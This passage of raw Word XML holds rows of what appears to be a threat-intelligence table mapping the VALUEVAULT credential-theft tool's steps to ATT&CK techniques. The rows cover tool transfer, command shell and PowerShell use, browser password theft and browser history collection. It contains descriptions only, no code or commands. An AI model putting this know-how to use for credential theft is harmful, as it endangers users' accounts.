            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FEA930D" w14:textId="3DA878AE" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45183822" w14:textId="1DEC47C4" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2E4518" w14:textId="77777777" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00EE29C0" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031D9445" w14:textId="2DEC7784" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20CDD9C9" w14:textId="4A1F96AA" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1428A8C6" w14:textId="586E9434" w:rsidR="00EE29C0" w:rsidRDefault="00575342" w:rsidP="002F6F9E">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00CB71E5">
              <w:t>VALUEVAULT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w14:paraId="4940A786" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7024AB" w14:textId="0BB90135" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="553B9DD8" w14:textId="4828473C" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B234C9F" w14:textId="01D49578" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="443F51D8" w14:textId="215A7EC1" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C339C77" w14:textId="77777777" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00EE29C0" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730668A1" w14:textId="4C41A3E9" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E8DBCD" w14:textId="017033CC" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B45364B" w14:textId="6D26E436" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:r>
              <w:t>[1] See above run VALUEVAULT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A2999" w:rsidRPr="00B857D7" w14:paraId="3A7ECFD5" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D968AF7" w14:textId="0CC8570A" w:rsidR="001A2999" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="535DF42E" w14:textId="169FA09D" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566D695E" w14:textId="4A8F841E" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1555.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CB71E5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E702120" w14:textId="2A5927B9" w:rsidR="001A2999" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB3AAA1" w14:textId="77777777" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="001A2999" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA5D2CD" w14:textId="6A21913A" w:rsidR="001A2999" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D950D77" w14:textId="60D7C61F" w:rsidR="001A2999" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3265F9" w14:textId="57DA8ED9" w:rsidR="001A2999" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB71E5">
              <w:t>VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain &amp; Abel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A4634B" w:rsidRPr="00A4634B" w14:paraId="2A604D55" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B0EAC99" w14:textId="66E547BC" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00A4634B" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D005F4C" w14:textId="3EBE6798" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00A4634B" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0254A7E0" w14:textId="0FD6309D" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00A4634B" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1005</w:t>
            </w:r>
            <w:r w:rsidR="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B8F7DF" w14:textId="28CA8B25" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00564152" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4709E208" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61312A55" w14:textId="0AC00628" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00564152" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3631DCD7" w14:textId="350BE0B8" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00564152" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F1F567" w14:textId="09925AAE" w:rsidR="00063FEC" w:rsidRPr="00EE0D6D" w:rsidRDefault="00A4634B" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D32684" w:rsidRPr="00B857D7" w14:paraId="32A4B164" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B7DF1F" w14:textId="07D78C3D" w:rsidR="00D32684" w:rsidRDefault="00C75069" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F76A0C" w14:textId="09B711A3" w:rsidR="00D32684" w:rsidRPr="00EE0D6D" w:rsidRDefault="00D32684" w:rsidP="00602963">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2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48AC3AA2" w14:textId="16A018F1" w:rsidR="00D32684" w:rsidRPr="00602963" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32684">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12523564" w14:textId="6FD216AE" w:rsidR="00D32684" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D6FD50" w14:textId="77777777" w:rsidR="00D32684" w:rsidRPr="00B857D7" w:rsidRDefault="00D32684" w:rsidP="00602963">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
